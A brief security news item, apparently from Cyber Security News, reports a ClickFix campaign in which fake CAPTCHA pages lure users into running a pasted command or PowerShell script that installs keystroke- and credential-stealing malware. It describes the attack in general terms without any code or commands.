This ongoing campaign uses a combination of fake CAPTCHA prompts and manual script execution to trick users into compromising their own systems.
Social Engineering Tactics
Cybercriminals are combining fake CAPTCHA verification pages with a deceptive technique known as ClickFix to steal usernames and passwords. In this campaign, users are presented with a page that looks like a legitimate CAPTCHA challenge. Instead of verifying a user, the page prompts them to fix a supposed error by copying and running a malicious script.
Attack Execution and Targets
The attack chain begins when a user visits a compromised or malicious website. An overlay appears asking the user to complete a CAPTCHA. Following the instructions leads the user to paste a command into their terminal or run a PowerShell script. This action downloads malware that captures keystrokes and browser credentials. The campaign is broad and targets any organization that relies on password-based authentication, with no specific industry being singled out.
Widespread Credential Theft Risk
The abuse of trusted web elements like CAPTCHAs makes this tactic particularly dangerous, as users are conditioned to obey such prompts. By tying the ClickFix social engineering method to credential theft, attackers bypass many traditional security controls. There are no specific CVEs associated with this general threat activity, as it exploits user behavior rather than a software vulnerability.
Source: Cyber Security News
